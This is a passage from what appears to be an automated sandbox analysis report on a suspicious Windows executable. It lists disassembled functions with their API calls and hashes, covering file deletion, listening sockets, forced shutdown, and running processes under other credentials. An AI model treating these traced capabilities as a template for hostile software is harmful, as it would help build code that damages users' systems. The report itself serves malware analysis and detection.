                                                            • Opcode Fuzzy Hash: da733c82408ff578dafe1c13f336b1af5d76369d3b93f2395acf6021ac6dc786
                                                            • Instruction Fuzzy Hash: 8D219C76600210DFDB22AF64EC49B6A7BACEF55710F10852AF946DF2A1DB70AD01CB54
                                                            Function 003C37EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00364750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00364743,?,?,003637AE,?), ref: 00364770
                                                              • Part of subcall function 003C4A31: GetFileAttributesW.KERNEL32(?,003C370B), ref: 003C4A32
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 003C38A3
                                                            • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 003C394B
                                                            • MoveFileW.KERNEL32(?,?), ref: 003C395E
                                                            • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 003C397B
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 003C399D
                                                            • FindClose.KERNEL32(00000000,?,?,?,?), ref: 003C39B9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                            • String ID: \*.*
                                                            • API String ID: 4002782344-1173974218
                                                            • Opcode ID: 8940847b610143af1ba85bb53ddfc5e8feced7696f664b6524489a18365fd69f
                                                            • Instruction ID: e3daee18caa00cf050d1abb0e9299bb95ab89c6a1c6f994598ff05b19aa1b007
                                                            • Opcode Fuzzy Hash: 8940847b610143af1ba85bb53ddfc5e8feced7696f664b6524489a18365fd69f
                                                            • Instruction Fuzzy Hash: 9851AF3180414CAACF17EBA0D992EEDB778AF11304F60816DE402BB195EF706F09CB61
                                                            Function 003CF3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                            • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 003CF440
                                                            • Sleep.KERNEL32(0000000A), ref: 003CF470
                                                            • _wcscmp.LIBCMT ref: 003CF484
                                                            • _wcscmp.LIBCMT ref: 003CF49F
                                                            • FindNextFileW.KERNEL32(?,?), ref: 003CF53D
                                                            • FindClose.KERNEL32(00000000), ref: 003CF553
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                            • String ID: *.*
                                                            • API String ID: 713712311-438819550
                                                            • Opcode ID: 83d50e86f1d64c051208fb3343a0abbfbf1e1dd0665e6210c3f743d2972c8f9d
                                                            • Instruction ID: 388de0495d87e7e9b1ff12d022555345d6957dc027297568e53c15a5af3a34dd
                                                            • Opcode Fuzzy Hash: 83d50e86f1d64c051208fb3343a0abbfbf1e1dd0665e6210c3f743d2972c8f9d
                                                            • Instruction Fuzzy Hash: 26417B7180021AAFCF16EF64CC45BEEBBB9FF05310F20456AE915A6190DB309E84CB50
                                                            Function 00373030 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 587COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: __itow__swprintf
                                                            • String ID: 3c7$_7
                                                            • API String ID: 674341424-4188345352
                                                            • Opcode ID: 875c4e6c01837f533c2db754b3ca567a8983a91234693bf9b6258eebe60587f5
                                                            • Instruction ID: 4396b301f9ebcb378ce8d23b85c0be8ce73baa1e8d0e06f3d8945e85b43cdab7
                                                            • Opcode Fuzzy Hash: 875c4e6c01837f533c2db754b3ca567a8983a91234693bf9b6258eebe60587f5
                                                            • Instruction Fuzzy Hash: F022AF716083009FD726DF24C881BAFB7E8EF85714F04891DF59A9B291DB75E904CB92
                                                            Function 00375760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: e2706926b7adba2e315d824fa44313b56b81242704e5db7a80f94dde88b20e3c
                                                            • Instruction ID: 55de2f476eace020f7a57870936593ca772753d4b4c49dd93a55a4e120328e2d
                                                            • Opcode Fuzzy Hash: e2706926b7adba2e315d824fa44313b56b81242704e5db7a80f94dde88b20e3c
                                                            • Instruction Fuzzy Hash: 4D129C70A00609EFCF19DFA4D981AEEB7F5FF48304F108569E44AEB650EB39A914CB50
                                                            Function 003C3B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00364750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00364743,?,?,003637AE,?), ref: 00364770
                                                              • Part of subcall function 003C4A31: GetFileAttributesW.KERNEL32(?,003C370B), ref: 003C4A32
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 003C3B89
                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 003C3BD9
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 003C3BEA
                                                            • FindClose.KERNEL32(00000000), ref: 003C3C01
                                                            • FindClose.KERNEL32(00000000), ref: 003C3C0A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                            • String ID: \*.*
                                                            • API String ID: 2649000838-1173974218
                                                            • Opcode ID: 4ef5aba4c4f198e1af36a77d192fa6f30a2f6e4a608df2c7e01c879d633dead0
                                                            • Instruction ID: bbc303e0f1f06f5e70bf642a146e3d5e7798f2cf3b2265c04baa291a3e5b843e
                                                            • Opcode Fuzzy Hash: 4ef5aba4c4f198e1af36a77d192fa6f30a2f6e4a608df2c7e01c879d633dead0
                                                            • Instruction Fuzzy Hash: DF316D350083859FC312EB24C891DAFB7E8AE95304F408E2DF4D59A191EB21DE08CB67
                                                            Function 003C51BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 003B87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003B882B
                                                              • Part of subcall function 003B87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003B8858
                                                              • Part of subcall function 003B87E1: GetLastError.KERNEL32 ref: 003B8865
                                                            • ExitWindowsEx.USER32(?,00000000), ref: 003C51F9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                            • String ID: $@$SeShutdownPrivilege
                                                            • API String ID: 2234035333-194228
                                                            • Opcode ID: bfe4ef4543ada4581c93fd558b8ab433e9e50c9c8c6b90f51fa1a9ec38782709
                                                            • Instruction ID: 9a056b0ed1bf8762705fc0b9135c59211e9e63300703fe58e0b8c2724b274abc
                                                            • Opcode Fuzzy Hash: bfe4ef4543ada4581c93fd558b8ab433e9e50c9c8c6b90f51fa1a9ec38782709
                                                            • Instruction Fuzzy Hash: 7E01F7316916156BF72A62689C8BFBB72DC9B05350F250D2DF913EA4D2DA917C808790
                                                            Function 0036FCE0 Relevance: 9.8, APIs: 3, Strings: 2, Instructions: 1040COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpper
                                                            • String ID: pbB$%?
                                                            • API String ID: 3964851224-3075198358
                                                            • Opcode ID: 8e39aaef128388568b39ee7f4642ed0b614b2d30458f374ce3b565decf8c9ffe
                                                            • Instruction ID: 5b63de59d6533bafd43b3b7282b03c8ca80ff3849b0f20d53225f72840a14503
                                                            • Opcode Fuzzy Hash: 8e39aaef128388568b39ee7f4642ed0b614b2d30458f374ce3b565decf8c9ffe
                                                            • Instruction Fuzzy Hash: 73927874608341CFD726DF24C480B2AB7E4FF89304F15896DE89A9B262D775EC45CB92
                                                            Function 003D6283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 003D62DC
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 003D62EB
                                                            • bind.WSOCK32(00000000,?,00000010), ref: 003D6307
                                                            • listen.WSOCK32(00000000,00000005), ref: 003D6316
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 003D6330
                                                            • closesocket.WSOCK32(00000000,00000000), ref: 003D6344
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$bindclosesocketlistensocket
                                                            • String ID:
                                                            • API String ID: 1279440585-0
                                                            • Opcode ID: 3dfc249c53a96143c35ceb34388db98b9be734219a744a0184c50a8952b68ef9
                                                            • Instruction ID: d11df50490c904097e89bfbf57c3595d6cd76563e81eb792cea51377425fa059
                                                            • Opcode Fuzzy Hash: 3dfc249c53a96143c35ceb34388db98b9be734219a744a0184c50a8952b68ef9
                                                            • Instruction Fuzzy Hash: 6321D5756002009FCB12EF64D886B6EB7ADEF49310F15825AE926AB3E1C770AD01CB51
                                                            Function 003B85B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 003B85E2
                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 003B85E9
                                                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 003B85F8
                                                            • CloseHandle.KERNEL32(00000004), ref: 003B8603
                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 003B8632
                                                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 003B8646
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                            • String ID:
                                                            • API String ID: 1413079979-0
                                                            • Opcode ID: 4be3e7264e04a3dbff1430b5f859fbf088bd66d9f916776c8fa7a66cb9c86b55
                                                            • Instruction ID: 8e2ffa918cedae5555949bee5920ee5d7d5cdcacade38d2f3394287cee096c67
                                                            • Opcode Fuzzy Hash: 4be3e7264e04a3dbff1430b5f859fbf088bd66d9f916776c8fa7a66cb9c86b55
                                                            • Instruction Fuzzy Hash: 4B11387250124DAFDF128FA4DD49BEA7BADEB48348F054165BE04A61A0C6719E60DB60
                                                            Function 00375520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00380DB6: std::exception::exception.LIBCMT ref: 00380DEC
                                                              • Part of subcall function 00380DB6: __CxxThrowException@8.LIBCMT ref: 00380E01
                                                            • _memmove.LIBCMT ref: 003B0258
                                                            • _memmove.LIBCMT ref: 003B036D
                                                            • _memmove.LIBCMT ref: 003B0414
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                            • String ID:
                                                            • API String ID: 1300846289-0
                                                            • Opcode ID: 2678823e90e9a4ad0b30de84de6c1186d2601501b9c6866a47e69e2f70bf5f5c
                                                            • Instruction ID: e7030ff1f551176c258e9db48c84a047f9f8206b150366991dba1e60659b671b
                                                            • Opcode Fuzzy Hash: 2678823e90e9a4ad0b30de84de6c1186d2601501b9c6866a47e69e2f70bf5f5c
                                                            • Instruction Fuzzy Hash: 6902D070A00209DBCF1ADF64D981AAEBBF5EF44304F14C4A9E90ADF255EB34DA54CB91
                                                            Function 00361287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00362612: GetWindowLongW.USER32(?,000000EB), ref: 00362623
                                                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 003619FA
                                                            • GetSysColor.USER32(0000000F), ref: 00361A4E
                                                            • SetBkColor.GDI32(?,00000000), ref: 00361A61
                                                              • Part of subcall function 00361290: DefDlgProcW.USER32(?,00000020,?), ref: 003612D8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ColorProc$LongWindow
                                                            • String ID:
                                                            • API String ID: 3744519093-0
                                                            • Opcode ID: d94e9e0979bf1f12dcd6157da80db4e9d1a18f2323e1231f28e1f492c619cac9
                                                            • Instruction ID: 5f907445d8b3ffbbaab8e8a951601563a118acfc099c7982cf3abef1332a4d54
                                                            • Opcode Fuzzy Hash: d94e9e0979bf1f12dcd6157da80db4e9d1a18f2323e1231f28e1f492c619cac9
                                                            • Instruction Fuzzy Hash: 2BA19B70112594BEEA3BAB69DC48EBF259CDB42346F1E8219F402DA5DACB208D01C2B5
                                                            Function 003CBCBC Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 003CBCE6
                                                            • _wcscmp.LIBCMT ref: 003CBD16
                                                            • _wcscmp.LIBCMT ref: 003CBD2B
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 003CBD3C
                                                            • FindClose.KERNEL32(00000000,00000001,00000000), ref: 003CBD6C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Find$File_wcscmp$CloseFirstNext
                                                            • String ID:
                                                            • API String ID: 2387731787-0
                                                            • Opcode ID: bb389f2f08e2890cacb3d44a86766105db13a4f72c9077757f4fe100fa4f7a9c
                                                            • Instruction ID: a28b72589f62ce949d1e81ff5d2af9274ee34454c1970978260331c5cdc68111
                                                            • Opcode Fuzzy Hash: bb389f2f08e2890cacb3d44a86766105db13a4f72c9077757f4fe100fa4f7a9c
                                                            • Instruction Fuzzy Hash: 3251AB75A047029FC716DF28C495EAAB3E8EF4A320F00465EE956CB3A1CB30ED04CB91
                                                            Function 003D6747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 003D7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 003D7DB6
                                                            • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 003D679E
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 003D67C7
                                                            • bind.WSOCK32(00000000,?,00000010), ref: 003D6800
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 003D680D
                                                            • closesocket.WSOCK32(00000000,00000000), ref: 003D6821
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                            • String ID:
                                                            • API String ID: 99427753-0
                                                            • Opcode ID: 4f9000c5340b27b99968b785bacd278881ae663bd14ff4a058a6335843254fd7
                                                            • Instruction ID: f7413fc8082be1498eb8ad028a30d2440433fbefae96ce790256fa8871ef1598
                                                            • Opcode Fuzzy Hash: 4f9000c5340b27b99968b785bacd278881ae663bd14ff4a058a6335843254fd7
                                                            • Instruction Fuzzy Hash: 4341C375A00214AFDB12AF64DC87F6E77EC9B09754F04C55AF91AAF3D2CA709D0087A1
                                                            Function 003E5376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                            • String ID:
                                                            • API String ID: 292994002-0
                                                            • Opcode ID: 36c398d8b0b2e83a8511405c972fa9d66543a36f615d426aa198465484396347
                                                            • Instruction ID: ab493fdfef19afc6c91880952be4fb18116df50b1c30f69a898f0d8ad58c1521
                                                            • Opcode Fuzzy Hash: 36c398d8b0b2e83a8511405c972fa9d66543a36f615d426aa198465484396347
                                                            • Instruction Fuzzy Hash: B111B6717009A19FDB235F279C84B6ABB9CEF457A5B418529F845DB2C1CBB09C018AA4
                                                            Function 003B80A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003B80C0
                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003B80CA
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003B80D9
                                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003B80E0
                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003B80F6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 44706859-0
                                                            • Opcode ID: c55101aae65d84c54d75bc6d9067dee08f4d4fb493d73e03aecf62064bae7107
                                                            • Instruction ID: 0e6a5faadfd1cc10f6bfeee04cec6bd4e66f3864c200580fcf4f2a09bd990e2f
                                                            • Opcode Fuzzy Hash: c55101aae65d84c54d75bc6d9067dee08f4d4fb493d73e03aecf62064bae7107
                                                            • Instruction Fuzzy Hash: 53F06835241244AFD7224F65DCCDEA73BACEF85759F010125F645C6190CBA1DD41DA60
                                                            Function 0036E6A0 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
